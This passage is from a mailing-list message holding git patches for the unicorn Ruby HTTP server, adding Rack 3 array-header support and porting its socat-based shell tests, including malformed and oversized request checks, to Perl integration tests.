-    assert %r{\AHTTP/\d\.\d 666 I AM THE BEAST\z}.match(headers[0])
-  end
-
-  def test_modified_rack_http_status_codes_late
-    r, w = IO.pipe
-    pid = fork do
-      r.close
-      # Users may want to globally override the status text associated
-      # with an HTTP status code in their app.
-      Rack::Utils::HTTP_STATUS_CODES[200] = "HI"
-      http_response_write(w, 200, {}, [])
-      w.close
-    end
-    w.close
-    assert_equal "HTTP/1.1 200 HI\r\n", r.gets
-    r.read # just drain the pipe
-    pid, status = Process.waitpid2(pid)
-    assert status.success?, status.inspect
-  ensure
-    r.close
-    w.close unless w.closed?
-  end
-end

[-- Attachment #3: 0002-support-rack-3-multi-value-headers.patch --]
[-- Type: text/x-diff, Size: 1710 bytes --]

From ea0559c700fa029044464de4bd572662c10b7273 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:31 +0000
Subject: [PATCH 02/23] support rack 3 multi-value headers

The first step in adding Rack 3 support.  Rack supports
multi-value headers via array rather than newlines.
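
For illustration, the same multi-value header in both conventions
(these literals mirror the endpoints added to t/integration.ru below):

  # Rack 2: values joined by newlines in a single String
  [ 200, { 'X-R2' => "a\nb\nc" }, [] ]
  # Rack 3: an Array of values (keys are lowercase)
  [ 200, { 'x-r3' => %w(a b c) }, [] ]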

Tested-by: Martin Posthumus <martin.posthumus@gmail.com>
Link: https://yhbt.net/unicorn-public/7c851d8a-bc57-7df8-3240-2f5ab831c47c@gmail.com/
---
 t/integration.ru | 1 +
 t/integration.t  | 9 +++++++++
 2 files changed, 10 insertions(+)

diff --git a/t/integration.ru b/t/integration.ru
index 6ef873c..5183217 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -23,6 +23,7 @@ def restore_status_code
   when 'GET'
     case env['PATH_INFO']
     when '/rack-2-newline-headers'; [ 200, { 'X-R2' => "a\nb\nc" }, [] ]
+    when '/rack-3-array-headers'; [ 200, { 'x-r3' => %w(a b c) }, [] ]
     when '/nil-header-value'; [ 200, { 'X-Nil' => nil }, [] ]
     when '/unknown-status-pass-through'; [ '666 I AM THE BEAST', {}, [] ]
     end # case PATH_INFO (GET)
diff --git a/t/integration.t b/t/integration.t
index 5569155..e876c71 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -38,6 +38,15 @@ SKIP: { # Date header check
 		diag(explain([$t, $!, \@d]));
 };
 
+
+$c = tcp_connect($srv);
+print $c "GET /rack-3-array-headers HTTP/1.0\r\n\r\n" or die $!;
+($status, $hdr) = slurp_hdr($c);
+is_deeply([ grep(/^x-r3: /, @$hdr) ],
+	[ 'x-r3: a', 'x-r3: b', 'x-r3: c' ],
+	'rack 3 array headers supported') or diag(explain($hdr));
+
+
 # cf. <CAO47=rJa=zRcLn_Xm4v2cHPr6c0UswaFC_omYFEH+baSxHOWKQ@mail.gmail.com>
 $c = tcp_connect($srv);
 print $c "GET /nil-header-value HTTP/1.0\r\n\r\n" or die $!;

[-- Attachment #4: 0003-port-t0018-write-on-close.sh-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 4091 bytes --]

From 295a6c616f8840bc04617a377c04c3422aeebddc Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:32 +0000
Subject: [PATCH 03/23] port t0018-write-on-close.sh to Perl 5

This doesn't require restarting, so it's a perfect candidate.
---
 t/integration.ru          | 15 +++++++++++++++
 t/integration.t           | 14 +++++++++++++-
 t/lib.perl                |  2 +-
 t/t0018-write-on-close.sh | 23 -----------------------
 t/write-on-close.ru       | 11 -----------
 5 files changed, 29 insertions(+), 36 deletions(-)
 delete mode 100755 t/t0018-write-on-close.sh
 delete mode 100644 t/write-on-close.ru

diff --git a/t/integration.ru b/t/integration.ru
index 5183217..12f5d48 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -18,6 +18,20 @@ def restore_status_code
   [ 200, {}, [] ]
 end
 
+class WriteOnClose
+  def each(&block)
+    @callback = block
+  end
+
+  def close
+    @callback.call "7\r\nGoodbye\r\n0\r\n\r\n"
+  end
+end
+
+def write_on_close
+  [ 200, { 'transfer-encoding' => 'chunked' }, WriteOnClose.new ]
+end
+
 run(lambda do |env|
   case env['REQUEST_METHOD']
   when 'GET'
@@ -26,6 +40,7 @@ def restore_status_code
     when '/rack-3-array-headers'; [ 200, { 'x-r3' => %w(a b c) }, [] ]
     when '/nil-header-value'; [ 200, { 'X-Nil' => nil }, [] ]
     when '/unknown-status-pass-through'; [ '666 I AM THE BEAST', {}, [] ]
+    when '/write_on_close'; write_on_close
     end # case PATH_INFO (GET)
   when 'POST'
     case env['PATH_INFO']
diff --git a/t/integration.t b/t/integration.t
index e876c71..3ab5c90 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -4,6 +4,7 @@
 
 use v5.14; BEGIN { require './t/lib.perl' };
 my $srv = tcp_server();
+my $host_port = tcp_host_port($srv);
 my $t0 = time;
 my $ar = unicorn(qw(-E none t/integration.ru), { 3 => $srv });
 
@@ -66,8 +67,19 @@ if ('TODO: ensure Rack::Utils::HTTP_STATUS_CODES is available') {
 	is($status, $orig_200_status, 'original status restored');
 }
 
+SKIP: {
+	eval { require HTTP::Tiny } or skip "HTTP::Tiny missing: $@", 1;
+	my $ht = HTTP::Tiny->new;
+	my $res = $ht->get("http://$host_port/write_on_close");
+	is($res->{content}, 'Goodbye', 'write-on-close body read');
+}
 
 # ... more stuff here
 undef $ar;
-diag slurp("$tmpdir/err.log") if $ENV{V};
+my @log = slurp("$tmpdir/err.log");
+diag("@log") if $ENV{V};
+my @err = grep(!/NameError.*Unicorn::Waiter/, grep(/error/i, @log));
+is_deeply(\@err, [], 'no unexpected errors in stderr');
+is_deeply([grep(/SIGKILL/, @log)], [], 'no SIGKILL in stderr');
+
 done_testing;
diff --git a/t/lib.perl b/t/lib.perl
index dd9c6b7..12deaf8 100644
--- a/t/lib.perl
+++ b/t/lib.perl
@@ -10,7 +10,7 @@ use POSIX qw(dup2 _exit setpgid :signal_h SEEK_SET F_SETFD);
 use File::Temp 0.19 (); # 0.19 for ->newdir
 our ($tmpdir, $errfh);
 our @EXPORT = qw(unicorn slurp tcp_server tcp_connect unicorn $tmpdir $errfh
-	SEEK_SET);
+	SEEK_SET tcp_host_port);
 
 my ($base) = ($0 =~ m!\b([^/]+)\.[^\.]+\z!);
 $tmpdir = File::Temp->newdir("unicorn-$base-XXXX", TMPDIR => 1);
diff --git a/t/t0018-write-on-close.sh b/t/t0018-write-on-close.sh
deleted file mode 100755
index 3afefea..0000000
--- a/t/t0018-write-on-close.sh
+++ /dev/null
@@ -1,23 +0,0 @@
-#!/bin/sh
-. ./test-lib.sh
-t_plan 4 "write-on-close tests for funky response-bodies"
-
-t_begin "setup and start" && {
-	unicorn_setup
-	unicorn -D -c $unicorn_config write-on-close.ru
-	unicorn_wait_start
-}
-
-t_begin "write-on-close response body succeeds" && {
-	test xGoodbye = x"$(curl -sSf http://$listen/)"
-}
-
-t_begin "killing succeeds" && {
-	kill $unicorn_pid
-}
-
-t_begin "check stderr" && {
-	check_stderr
-}
-
-t_done
diff --git a/t/write-on-close.ru b/t/write-on-close.ru
deleted file mode 100644
index 725c4d6..0000000
--- a/t/write-on-close.ru
+++ /dev/null
@@ -1,11 +0,0 @@
-class WriteOnClose
-  def each(&block)
-    @callback = block
-  end
-
-  def close
-    @callback.call "7\r\nGoodbye\r\n0\r\n\r\n"
-  end
-end
-use Rack::ContentType, "text/plain"
-run(lambda { |_| [ 200, { 'transfer-encoding' => 'chunked' }, WriteOnClose.new ] })

[-- Attachment #5: 0004-port-t0000-http-basic.sh-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 3372 bytes --]

From 1bb4362cee167ac7aeec910d3f52419e391f1e61 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:33 +0000
Subject: [PATCH 04/23] port t0000-http-basic.sh to Perl 5

One more socat dependency down...
---
 t/integration.ru      | 16 ++++++++++++++
 t/integration.t       | 11 ++++++++++
 t/t0000-http-basic.sh | 50 -------------------------------------------
 3 files changed, 27 insertions(+), 50 deletions(-)
 delete mode 100755 t/t0000-http-basic.sh

diff --git a/t/integration.ru b/t/integration.ru
index 12f5d48..c0bef99 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -32,6 +32,21 @@ def write_on_close
   [ 200, { 'transfer-encoding' => 'chunked' }, WriteOnClose.new ]
 end
 
+def env_dump(env)
+  require 'json'
+  h = {}
+  env.each do |k,v|
+    case v
+    when String, Integer, true, false; h[k] = v
+    else
+      case k
+      when 'rack.version', 'rack.after_reply'; h[k] = v
+      end
+    end
+  end
+  h.to_json
+end
+
 run(lambda do |env|
   case env['REQUEST_METHOD']
   when 'GET'
@@ -40,6 +55,7 @@ def write_on_close
     when '/rack-3-array-headers'; [ 200, { 'x-r3' => %w(a b c) }, [] ]
     when '/nil-header-value'; [ 200, { 'X-Nil' => nil }, [] ]
     when '/unknown-status-pass-through'; [ '666 I AM THE BEAST', {}, [] ]
+    when '/env_dump'; [ 200, {}, [ env_dump(env) ] ]
     when '/write_on_close'; write_on_close
     end # case PATH_INFO (GET)
   when 'POST'
diff --git a/t/integration.t b/t/integration.t
index 3ab5c90..ee22e7e 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -47,6 +47,17 @@ is_deeply([ grep(/^x-r3: /, @$hdr) ],
 	[ 'x-r3: a', 'x-r3: b', 'x-r3: c' ],
 	'rack 3 array headers supported') or diag(explain($hdr));
 
+SKIP: {
+	eval { require JSON::PP } or skip "JSON::PP missing: $@", 1;
+	$c = tcp_connect($srv);
+	print $c "GET /env_dump\r\n" or die $!;
+	my $json = do { local $/; readline($c) };
+	unlike($json, qr/^Connection: /smi, 'no connection header for 0.9');
+	unlike($json, qr!\AHTTP/!s, 'no HTTP/1.x prefix for 0.9');
+	my $env = JSON::PP->new->decode($json);
+	is(ref($env), 'HASH', 'JSON decoded body to hashref');
+	is($env->{SERVER_PROTOCOL}, 'HTTP/0.9', 'SERVER_PROTOCOL is 0.9');
+}
 
 # cf. <CAO47=rJa=zRcLn_Xm4v2cHPr6c0UswaFC_omYFEH+baSxHOWKQ@mail.gmail.com>
 $c = tcp_connect($srv);
diff --git a/t/t0000-http-basic.sh b/t/t0000-http-basic.sh
deleted file mode 100755
index 8ab58ac..0000000
--- a/t/t0000-http-basic.sh
+++ /dev/null
@@ -1,50 +0,0 @@
-#!/bin/sh
-. ./test-lib.sh
-t_plan 8 "simple HTTP connection tests"
-
-t_begin "setup and start" && {
-	unicorn_setup
-	unicorn -D -c $unicorn_config env.ru
-	unicorn_wait_start
-}
-
-t_begin "single request" && {
-	curl -sSfv http://$listen/
-}
-
-t_begin "check stderr has no errors" && {
-	check_stderr
-}
-
-t_begin "HTTP/0.9 request should not return headers" && {
-	(
-		printf 'GET /\r\n'
-		cat $fifo > $tmp &
-		wait
-		echo ok > $ok
-	) | socat - TCP:$listen > $fifo
-}
-
-t_begin "env.inspect should've put everything on one line" && {
-	test 1 -eq $(count_lines < $tmp)
-}
-
-t_begin "no headers in output" && {
-	if grep ^Connection: $tmp
-	then
-		die "Connection header found in $tmp"
-	elif grep ^HTTP/ $tmp
-	then
-		die "HTTP/ found in $tmp"
-	fi
-}
-
-t_begin "killing succeeds" && {
-	kill $unicorn_pid
-}
-
-t_begin "check stderr has no errors" && {
-	check_stderr
-}
-
-t_done

[-- Attachment #6: 0005-port-t0002-parser-error.sh-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 4875 bytes --]

From 2eb7b1662c291ab535ee5dabf5d96194ca6483d4 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:34 +0000
Subject: [PATCH 05/23] port t0002-parser-error.sh to Perl 5

Another socat dependency down...
---
 t/integration.t         | 33 +++++++++++++++
 t/lib.perl              |  9 +++-
 t/t0002-parser-error.sh | 94 -----------------------------------------
 3 files changed, 41 insertions(+), 95 deletions(-)
 delete mode 100755 t/t0002-parser-error.sh

diff --git a/t/integration.t b/t/integration.t
index ee22e7e..503b7eb 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -85,6 +85,39 @@ SKIP: {
 	is($res->{content}, 'Goodbye', 'write-on-close body read');
 }
 
+if ('bad requests') {
+	$c = start_req($srv, 'GET /env_dump HTTP/1/1');
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 400 \b!, 'got 400 on bad request');
+
+	$c = tcp_connect($srv);
+	print $c 'GET /' or die $!;
+	my $buf = join('', (0..9), 'ab');
+	for (0..1023) { print $c $buf or die $! }
+	print $c " HTTP/1.0\r\n\r\n" or die $!;
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 414 \b!,
+		'414 on REQUEST_PATH > (12 * 1024)');
+
+	$c = tcp_connect($srv);
+	print $c 'GET /hello-world?a' or die $!;
+	$buf = join('', (0..9));
+	for (0..1023) { print $c $buf or die $! }
+	print $c " HTTP/1.0\r\n\r\n" or die $!;
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 414 \b!,
+		'414 on QUERY_STRING > (10 * 1024)');
+
+	$c = tcp_connect($srv);
+	print $c 'GET /hello-world#a' or die $!;
+	$buf = join('', (0..9), 'a'..'f');
+	for (0..63) { print $c $buf or die $! }
+	print $c " HTTP/1.0\r\n\r\n" or die $!;
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 414 \b!, '414 on FRAGMENT > (1024)');
+}
+
+
 # ... more stuff here
 undef $ar;
 my @log = slurp("$tmpdir/err.log");
diff --git a/t/lib.perl b/t/lib.perl
index 12deaf8..7d712b5 100644
--- a/t/lib.perl
+++ b/t/lib.perl
@@ -10,7 +10,7 @@ use POSIX qw(dup2 _exit setpgid :signal_h SEEK_SET F_SETFD);
 use File::Temp 0.19 (); # 0.19 for ->newdir
 our ($tmpdir, $errfh);
 our @EXPORT = qw(unicorn slurp tcp_server tcp_connect unicorn $tmpdir $errfh
-	SEEK_SET tcp_host_port);
+	SEEK_SET tcp_host_port start_req);
 
 my ($base) = ($0 =~ m!\b([^/]+)\.[^\.]+\z!);
 $tmpdir = File::Temp->newdir("unicorn-$base-XXXX", TMPDIR => 1);
@@ -59,6 +59,13 @@ sub tcp_connect {
 	$s;
 }
 
+sub start_req {
+	my ($srv, @req) = @_;
+	my $c = tcp_connect($srv);
+	print $c @req, "\r\n\r\n" or die "print: $!";
+	$c;
+}
+
 sub slurp {
 	open my $fh, '<', $_[0] or die "open($_[0]): $!";
 	local $/;
diff --git a/t/t0002-parser-error.sh b/t/t0002-parser-error.sh
deleted file mode 100755
index 9dc1cd2..0000000
--- a/t/t0002-parser-error.sh
+++ /dev/null
@@ -1,94 +0,0 @@
-#!/bin/sh
-. ./test-lib.sh
-t_plan 11 "parser error test"
-
-t_begin "setup and startup" && {
-	unicorn_setup
-	unicorn -D env.ru -c $unicorn_config
-	unicorn_wait_start
-}
-
-t_begin "send a bad request" && {
-	(
-		printf 'GET / HTTP/1/1\r\nHost: example.com\r\n\r\n'
-		cat $fifo > $tmp &
-		wait
-		echo ok > $ok
-	) | socat - TCP:$listen > $fifo
-	test xok = x$(cat $ok)
-}
-
-dbgcat tmp
-
-t_begin "response should be a 400" && {
-	grep -F 'HTTP/1.1 400 Bad Request' $tmp
-}
-
-t_begin "send a huge Request URI (REQUEST_PATH > (12 * 1024))" && {
-	rm -f $tmp
-	cat $fifo > $tmp &
-	(
-		set -e
-		trap 'echo ok > $ok' EXIT
-		printf 'GET /'
-		for i in $(awk </dev/null 'BEGIN{for(i=0;i<1024;i++) print i}')
-		do
-			printf '0123456789ab'
-		done
-		printf ' HTTP/1.1\r\nHost: example.com\r\n\r\n'
-	) | socat - TCP:$listen > $fifo || :
-	test xok = x$(cat $ok)
-	wait
-}
-
-t_begin "response should be a 414 (REQUEST_PATH)" && {
-	grep -F 'HTTP/1.1 414 ' $tmp
-}
-
-t_begin "send a huge Request URI (QUERY_STRING > (10 * 1024))" && {
-	rm -f $tmp
-	cat $fifo > $tmp &
-	(
-		set -e
-		trap 'echo ok > $ok' EXIT
-		printf 'GET /hello-world?a'
-		for i in $(awk </dev/null 'BEGIN{for(i=0;i<1024;i++) print i}')
-		do
-			printf '0123456789'
-		done
-		printf ' HTTP/1.1\r\nHost: example.com\r\n\r\n'
-	) | socat - TCP:$listen > $fifo || :
-	test xok = x$(cat $ok)
-	wait
-}
-
-t_begin "response should be a 414 (QUERY_STRING)" && {
-	grep -F 'HTTP/1.1 414 ' $tmp
-}
-
-t_begin "send a huge Request URI (FRAGMENT > 1024)" && {
-	rm -f $tmp
-	cat $fifo > $tmp &
-	(
-		set -e
-		trap 'echo ok > $ok' EXIT
-		printf 'GET /hello-world#a'
-		for i in $(awk </dev/null 'BEGIN{for(i=0;i<64;i++) print i}')
-		do
-			printf '0123456789abcdef'
-		done
-		printf ' HTTP/1.1\r\nHost: example.com\r\n\r\n'
-	) | socat - TCP:$listen > $fifo || :
-	test xok = x$(cat $ok)
-	wait
-}
-
-t_begin "response should be a 414 (FRAGMENT)" && {
-	grep -F 'HTTP/1.1 414 ' $tmp
-}
-
-t_begin "server stderr should be clean" && check_stderr
-
-t_begin "term signal sent" && kill $unicorn_pid
-
-t_done

[-- Attachment #7: 0006-t-integration.t-use-start_req-to-simplify-test-sligh.patch --]
[-- Type: text/x-diff, Size: 2556 bytes --]

From 0bb06cc0c8c4f5b76514858067bbb2871dda0d6e Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:35 +0000
Subject: [PATCH 06/23] t/integration.t: use start_req to simplify test slightly

Less code is usually better.
---
 t/integration.t | 18 ++++++------------
 1 file changed, 6 insertions(+), 12 deletions(-)

diff --git a/t/integration.t b/t/integration.t
index 503b7eb..b7ba1fb 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -20,8 +20,7 @@ sub slurp_hdr {
 my ($c, $status, $hdr);
 
 # response header tests
-$c = tcp_connect($srv);
-print $c "GET /rack-2-newline-headers HTTP/1.0\r\n\r\n" or die $!;
+$c = start_req($srv, 'GET /rack-2-newline-headers HTTP/1.0');
 ($status, $hdr) = slurp_hdr($c);
 like($status, qr!\AHTTP/1\.[01] 200\b!, 'status line valid');
 my $orig_200_status = $status;
@@ -40,8 +39,7 @@ SKIP: { # Date header check
 };
 
 
-$c = tcp_connect($srv);
-print $c "GET /rack-3-array-headers HTTP/1.0\r\n\r\n" or die $!;
+$c = start_req($srv, 'GET /rack-3-array-headers HTTP/1.0');
 ($status, $hdr) = slurp_hdr($c);
 is_deeply([ grep(/^x-r3: /, @$hdr) ],
 	[ 'x-r3: a', 'x-r3: b', 'x-r3: c' ],
@@ -49,8 +47,7 @@ is_deeply([ grep(/^x-r3: /, @$hdr) ],
 
 SKIP: {
 	eval { require JSON::PP } or skip "JSON::PP missing: $@", 1;
-	$c = tcp_connect($srv);
-	print $c "GET /env_dump\r\n" or die $!;
+	my $c = start_req($srv, 'GET /env_dump');
 	my $json = do { local $/; readline($c) };
 	unlike($json, qr/^Connection: /smi, 'no connection header for 0.9');
 	unlike($json, qr!\AHTTP/!s, 'no HTTP/1.x prefix for 0.9');
@@ -60,20 +57,17 @@ SKIP: {
 }
 
 # cf. <CAO47=rJa=zRcLn_Xm4v2cHPr6c0UswaFC_omYFEH+baSxHOWKQ@mail.gmail.com>
-$c = tcp_connect($srv);
-print $c "GET /nil-header-value HTTP/1.0\r\n\r\n" or die $!;
+$c = start_req($srv, 'GET /nil-header-value HTTP/1.0');
 ($status, $hdr) = slurp_hdr($c);
 is_deeply([grep(/^X-Nil:/, @$hdr)], ['X-Nil: '],
 	'nil header value accepted for broken apps') or diag(explain($hdr));
 
 if ('TODO: ensure Rack::Utils::HTTP_STATUS_CODES is available') {
-	$c = tcp_connect($srv);
-	print $c "POST /tweak-status-code HTTP/1.0\r\n\r\n" or die $!;
+	$c = start_req($srv, 'POST /tweak-status-code HTTP/1.0');
 	($status, $hdr) = slurp_hdr($c);
 	like($status, qr!\AHTTP/1\.[01] 200 HI\b!, 'status tweaked');
 
-	$c = tcp_connect($srv);
-	print $c "POST /restore-status-code HTTP/1.0\r\n\r\n" or die $!;
+	$c = start_req($srv, 'POST /restore-status-code HTTP/1.0');
 	($status, $hdr) = slurp_hdr($c);
 	is($status, $orig_200_status, 'original status restored');
 }

[-- Attachment #8: 0007-port-t0011-active-unix-socket.sh-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 6945 bytes --]

From 10c83beaca58df8b92d8228e798559069cd89beb Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:36 +0000
Subject: [PATCH 07/23] port t0011-active-unix-socket.sh to Perl 5

Another socat dependency down...  I've also started turning
FD_CLOEXEC off on a pipe as a mechanism to detect daemonized
process death in tests.
---
 t/active-unix-socket.t        | 117 ++++++++++++++++++++++++++++++++++
 t/integration.ru              |   1 +
 t/t0011-active-unix-socket.sh |  79 -----------------------
 3 files changed, 118 insertions(+), 79 deletions(-)
 create mode 100644 t/active-unix-socket.t
 delete mode 100755 t/t0011-active-unix-socket.sh

diff --git a/t/active-unix-socket.t b/t/active-unix-socket.t
new file mode 100644
index 0000000..6b5c218
--- /dev/null
+++ b/t/active-unix-socket.t
@@ -0,0 +1,117 @@
+#!perl -w
+# Copyright (C) unicorn hackers <unicorn-public@yhbt.net>
+# License: GPL-3.0+ <https://www.gnu.org/licenses/gpl-3.0.txt>
+
+use v5.14; BEGIN { require './t/lib.perl' };
+use IO::Socket::UNIX;
+my %to_kill;
+END { kill('TERM', values(%to_kill)) if keys %to_kill }
+my $u1 = "$tmpdir/u1.sock";
+my $u2 = "$tmpdir/u2.sock";
+my $unix_req = sub {
+	my $s = IO::Socket::UNIX->new(Peer => shift, Type => SOCK_STREAM);
+	print $s @_, "\r\n\r\n" or die $!;
+	$s;
+};
+{
+	use autodie;
+	open my $fh, '>', "$tmpdir/u1.conf.rb";
+	print $fh <<EOM;
+pid "$tmpdir/u.pid"
+listen "$u1"
+stderr_path "$tmpdir/err1.log"
+EOM
+	close $fh;
+
+	open $fh, '>', "$tmpdir/u2.conf.rb";
+	print $fh <<EOM;
+pid "$tmpdir/u.pid"
+listen "$u2"
+stderr_path "$tmpdir/err2.log"
+EOM
+	close $fh;
+
+	open $fh, '>', "$tmpdir/u3.conf.rb";
+	print $fh <<EOM;
+pid "$tmpdir/u3.pid"
+listen "$u1"
+stderr_path "$tmpdir/err3.log"
+EOM
+	close $fh;
+}
+
+my @uarg = qw(-D -E none t/integration.ru);
+
+# this pipe will be used to notify us when all daemons die:
+pipe(my ($p0, $p1)) or die "pipe: $!";
+fcntl($p1, POSIX::F_SETFD, 0) or die "fcntl: $!"; # clear FD_CLOEXEC
+
+# start the first instance
+unicorn('-c', "$tmpdir/u1.conf.rb", @uarg)->join;
+is($?, 0, 'daemonized 1st process');
+chomp($to_kill{u1} = slurp("$tmpdir/u.pid"));
+like($to_kill{u1}, qr/\A\d+\z/s, 'read pid file');
+
+chomp(my $worker_pid = readline($unix_req->($u1, 'GET /pid')));
+like($worker_pid, qr/\A\d+\z/s, 'captured worker pid');
+ok(kill(0, $worker_pid), 'worker is kill-able');
+
+
+# 2nd process conflicts on PID
+unicorn('-c', "$tmpdir/u2.conf.rb", @uarg)->join;
+isnt($?, 0, 'conflicting PID file fails to start');
+
+chomp(my $pidf = slurp("$tmpdir/u.pid"));
+is($pidf, $to_kill{u1}, 'pid file contents unchanged after start failure');
+
+chomp(my $pid2 = readline($unix_req->($u1, 'GET /pid')));
+is($worker_pid, $pid2, 'worker PID unchanged');
+
+
+# 3rd process conflicts on socket
+unicorn('-c', "$tmpdir/u3.conf.rb", @uarg)->join;
+isnt($?, 0, 'conflicting UNIX socket fails to start');
+
+chomp($pid2 = readline($unix_req->($u1, 'GET /pid')));
+is($worker_pid, $pid2, 'worker PID still unchanged');
+
+chomp($pidf = slurp("$tmpdir/u.pid"));
+is($pidf, $to_kill{u1}, 'pid file contents unchanged after 2nd start failure');
+
+{ # teardown initial process via SIGKILL
+	ok(kill('KILL', delete $to_kill{u1}), 'SIGKILL initial daemon');
+	close $p1;
+	vec(my $rvec = '', fileno($p0), 1) = 1;
+	is(select($rvec, undef, undef, 5), 1, 'timeout for pipe HUP');
+	is(my $undef = <$p0>, undef, 'process closed pipe writer at exit');
+	ok(-f "$tmpdir/u.pid", 'pid file stayed after SIGKILL');
+	ok(-S $u1, 'socket stayed after SIGKILL');
+	is(IO::Socket::UNIX->new(Peer => $u1, Type => SOCK_STREAM), undef,
+		'fail to connect to u1');
+	ok(!kill(0, $worker_pid), 'worker gone after parent dies');
+}
+
+# restart the first instance
+{
+	pipe(($p0, $p1)) or die "pipe: $!";
+	fcntl($p1, POSIX::F_SETFD, 0) or die "fcntl: $!"; # clear FD_CLOEXEC
+	unicorn('-c', "$tmpdir/u1.conf.rb", @uarg)->join;
+	is($?, 0, 'daemonized 1st process');
+	chomp($to_kill{u1} = slurp("$tmpdir/u.pid"));
+	like($to_kill{u1}, qr/\A\d+\z/s, 'read pid file');
+
+	chomp($pid2 = readline($unix_req->($u1, 'GET /pid')));
+	like($pid2, qr/\A\d+\z/, 'worker running');
+
+	ok(kill('TERM', delete $to_kill{u1}), 'SIGTERM restarted daemon');
+	close $p1;
+	vec(my $rvec = '', fileno($p0), 1) = 1;
+	is(select($rvec, undef, undef, 5), 1, 'timeout for pipe HUP');
+	is(my $undef = <$p0>, undef, 'process closed pipe writer at exit');
+	ok(!-f "$tmpdir/u.pid", 'pid file gone after SIGTERM');
+	ok(-S $u1, 'socket stays after SIGTERM');
+}
+
+my @log = slurp("$tmpdir/err.log");
+diag("@log") if $ENV{V};
+done_testing;
diff --git a/t/integration.ru b/t/integration.ru
index c0bef99..21f5449 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -57,6 +57,7 @@ def env_dump(env)
     when '/unknown-status-pass-through'; [ '666 I AM THE BEAST', {}, [] ]
     when '/env_dump'; [ 200, {}, [ env_dump(env) ] ]
     when '/write_on_close'; write_on_close
+    when '/pid'; [ 200, {}, [ "#$$\n" ] ]
     end # case PATH_INFO (GET)
   when 'POST'
     case env['PATH_INFO']
diff --git a/t/t0011-active-unix-socket.sh b/t/t0011-active-unix-socket.sh
deleted file mode 100755
index fae0b6c..0000000
--- a/t/t0011-active-unix-socket.sh
+++ /dev/null
@@ -1,79 +0,0 @@
-#!/bin/sh
-. ./test-lib.sh
-t_plan 11 "existing UNIX domain socket check"
-
-read_pid_unix () {
-	x=$(printf 'GET / HTTP/1.0\r\n\r\n' | \
-	    socat - UNIX:$unix_socket | \
-	    tail -1)
-	test -n "$x"
-	y="$(expr "$x" : '\([0-9][0-9]*\)')"
-	test x"$x" = x"$y"
-	test -n "$y"
-	echo "$y"
-}
-
-t_begin "setup and start" && {
-	rtmpfiles unix_socket unix_config
-	rm -f $unix_socket
-	unicorn_setup
-	grep -v ^listen < $unicorn_config > $unix_config
-	echo "listen '$unix_socket'" >> $unix_config
-	unicorn -D -c $unix_config pid.ru
-	unicorn_wait_start
-	orig_master_pid=$unicorn_pid
-}
-
-t_begin "get pid of worker" && {
-	worker_pid=$(read_pid_unix)
-	t_info "worker_pid=$worker_pid"
-}
-
-t_begin "fails to start with existing pid file" && {
-	rm -f $ok
-	unicorn -D -c $unix_config pid.ru || echo ok > $ok
-	test x"$(cat $ok)" = xok
-}
-
-t_begin "worker pid unchanged" && {
-	test x"$(read_pid_unix)" = x$worker_pid
-	> $r_err
-}
-
-t_begin "fails to start with listening UNIX domain socket bound" && {
-	rm $ok $pid
-	unicorn -D -c $unix_config pid.ru || echo ok > $ok
-	test x"$(cat $ok)" = xok
-	> $r_err
-}
-
-t_begin "worker pid unchanged (again)" && {
-	test x"$(read_pid_unix)" = x$worker_pid
-}
-
-t_begin "nuking the existing Unicorn succeeds" && {
-	kill -9 $unicorn_pid
-	while kill -0 $unicorn_pid
-	do
-		sleep 1
-	done
-	check_stderr
-}
-
-t_begin "succeeds in starting with leftover UNIX domain socket bound" && {
-	test -S $unix_socket
-	unicorn -D -c $unix_config pid.ru
-	unicorn_wait_start
-}
-
-t_begin "worker pid changed" && {
-	test x"$(read_pid_unix)" != x$worker_pid
-}
-
-t_begin "killing succeeds" && {
-	kill $unicorn_pid
-}
-
-t_begin "no errors" && check_stderr
-
-t_done

[-- Attachment #9: 0008-port-t0100-rack-input-tests.sh-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 11722 bytes --]

From b4ed148186295f2d5c8448eab7f2b201615d1e4e Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:37 +0000
Subject: [PATCH 08/23] port t0100-rack-input-tests.sh to Perl 5

Yet another socat dependency gone \o/
---
 t/bin/content-md5-put       |  36 -----------
 t/integration.ru            |  27 +++++++-
 t/integration.t             |  97 +++++++++++++++++++++++++++-
 t/lib.perl                  |   3 +-
 t/rack-input-tests.ru       |  21 ------
 t/t0100-rack-input-tests.sh | 124 ------------------------------------
 6 files changed, 124 insertions(+), 184 deletions(-)
 delete mode 100755 t/bin/content-md5-put
 delete mode 100644 t/rack-input-tests.ru
 delete mode 100755 t/t0100-rack-input-tests.sh

diff --git a/t/bin/content-md5-put b/t/bin/content-md5-put
deleted file mode 100755
index 01da0bb..0000000
--- a/t/bin/content-md5-put
+++ /dev/null
@@ -1,36 +0,0 @@
